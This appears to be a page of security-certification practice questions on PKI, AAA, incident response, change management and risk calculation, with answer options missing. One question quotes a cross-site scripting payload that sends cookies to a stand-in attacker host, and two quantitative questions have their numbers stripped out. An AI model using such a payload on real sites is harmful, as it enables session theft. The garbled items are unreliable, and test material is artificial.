All practice questions
2232 questions
An organization wants to optimize web traffic performance and protect user privacy by reducing client requests to external Certificate Authorities for certificate status verification. Which of the following PKI mechanisms allows the web server itself to fetch and present a signed, timestamped certificate status directly to the client during the TLS handshake?
An organization is updating its enterprise access management architecture to align with security frameworks. Match each operational capability on the left to the corresponding pillar or sub-component of the Authentication, Authorization, and Accounting (AAA) framework on the right.
Click a left item, then click its matching right item
Items
Matches
A healthcare organization's cloud operations team plans to update the TLS configuration on its primary API gateways by disabling TLS 1.0 and 1.1 to comply with updated security baselines. Before the Change Advisory Board (CAB) approves this modification, which action should the security team mandate to evaluate the potential security and functional impact of the proposed change?
A security administrator is configuring a new high-security internal microservice that requires a valid server TLS certificate. Enterprise policy mandates hardware key protection, accurate Subject Alternative Name (SAN) extension mapping, intermediate CA trust anchoring, and OCSP stapling to eliminate direct client queries to the Certificate Authority. In what order should the administrator perform the following steps to deploy the certificate and enable OCSP stapling?
Drag items to arrange them in the correct order
A security analyst is selecting a key exchange mechanism for lightweight microservices communicating over an untrusted enterprise network. The solution must allow the services to negotiate shared symmetric session keys, ensure that compromise of a long-term private key does not expose past session traffic (perfect forward secrecy), and minimize CPU computational overhead on the constrained nodes. Which of the following algorithms or protocols best fulfills these requirements?
A security analyst monitoring network security telemetry reviews the following correlated NIDS alert and NetFlow summary:
[ALERT] NIDS: Suspicious Protocol Anomaly Detected
Timestamp: 2026-07-27T14:22:10Z
Sensor ID: NIDS-PERIMETER-01
Source IP: 10.1.50.88 (Internal Workstation)
Destination IP: 203.0.113.195 (External Host)
Protocol: ICMP Type 8 (Echo Request)
Details: ICMP payload size 1480 bytes; Payload Entropy: 7.92 (High); Request Rate: 450/min
NetFlow Summary (10.1.50.88 -> 203.0.113.195):
Bytes Sent: 52,400,000 | Bytes Received: 12,000 | Total Packets: 35,500
Based on the telemetry provided, which of the following represents the primary threat activity occurring and the most appropriate immediate action?
A security operations team is implementing a Just-In-Time (JIT) Privileged Access Management (PAM) workflow to enforce least privilege for emergency system administration. Place the operational steps of the JIT access lifecycle in the correct sequential order from initial request submission to final audit completion.
Drag items to arrange them in the correct order
A network security analyst reviews an alert generated by an inline Network Intrusion Prevention System (NIPS) deployed at the enterprise boundary. The alert log displays the following HTTP request payload captured during an inbound connection:
`GET /profile.php?user=<script>document.location='http://attacker.com/steal.cgi?cookie='+document.cookie</script> HTTP/1.1`
Immediately following this log entry, the NIPS triggered an automated active response that dropped the TCP stream and blocked the remote source IP address for 60 minutes. Which of the following statements correctly identifies the vector of this attack and characterizes the primary security control function demonstrated by the NIPS?
An enterprise security operations team needs to update core firewall access control lists (ACLs) to accommodate a new external application service. Place the standard security change management workflow steps in the correct chronological order from first to last.
Drag items to arrange them in the correct order
During routine monitoring, a Security Operations Center (SOC) team detects an active Command and Control (C2) session originating from an internal workstation following the execution of an unauthorized payload. Security logs indicate the compromised host is attempting lateral reconnaissance against neighboring internal subnets. According to standard incident response frameworks, which of the following actions should the incident response team perform FIRST?
A security analyst must assign the appropriate scanning methodology to four distinct security assessment requirements within an enterprise organization. Match each security assessment requirement with the most appropriate vulnerability scanning methodology.
Click a left item, then click its matching right item
Items
Matches
A company is conducting a quantitative risk assessment for a standalone database server. The Asset Value () of the server is , and the estimated Exposure Factor () for a server drive failure is (). Historical records indicate that this failure occurs once every two years, resulting in an Annual Rate of Occurrence () of . What is the Annual Loss Expectancy () for this risk?
A security administrator is evaluating mechanisms to verify whether a digital certificate has been invalidated before its natural expiration date. Which of the following methods can be used to check the revocation status of an enterprise TLS certificate? (Select TWO.)
Select all that apply
Following an enterprise-wide audit, a Chief Information Security Officer (CISO) is restructuring the organizational governance framework to clear up employee confusion between mandatory directives and discretionary recommendations. Which of the following governance document types establish mandatory requirements that enforce compliance across the enterprise? (Select TWO).
Select all that apply
An enterprise security engineer configures a centralized TACACS+ server to manage administrative access to core switches. A network technician successfully enters their credentials and time-based one-time password (TOTP) to establish an interactive console session. However, when attempting to execute interface configuration commands, the router rejects the command with a privilege denial message. Which pillar of the AAA framework is responsible for determining whether the technician can execute these specific commands?
An enterprise security analyst investigates an incident where several corporate accounts were compromised. The investigation reveals that employees received text messages on their mobile devices directing them to a fake login site to verify credentials. Additionally, the attacker placed phone calls to affected staff while pretending to be internal IT personnel to convince them to approve multi-factor authentication (MFA) push notifications. Which of the following social engineering attack vectors were directly executed in this campaign? (Select TWO.)
Select all that apply
A security analyst is configuring an automated SOAR workflow to respond to account compromise indicators stemming from impossible travel alerts. Which of the following automated actions should be incorporated into the playbook to ensure immediate identity containment while avoiding unintended enterprise disruptions? (Select TWO.)
Select all that apply
A security administrator is deploying a centralized access management solution for enterprise network infrastructure. Which of the following technical configurations directly represent the Authorization pillar of the AAA framework? (Select TWO.)
Select all that apply
A DevOps engineering team plans to deploy an automated continuous integration and continuous deployment (CI/CD) pipeline update that alters how production application secrets are fetched and stored. To minimize potential security impacts and align with enterprise change management governance, which of the following procedures should be completed before deploying this change to production? (Select TWO.)
Select all that apply
An organization evaluates the financial impact of a potential security breach on its primary cloud backup repository. The repository has an estimated Asset Value () of . Security analysts determine that a severe ransomware infection would result in an Exposure Factor () of . What is the Single Loss Expectancy () in dollars for this asset?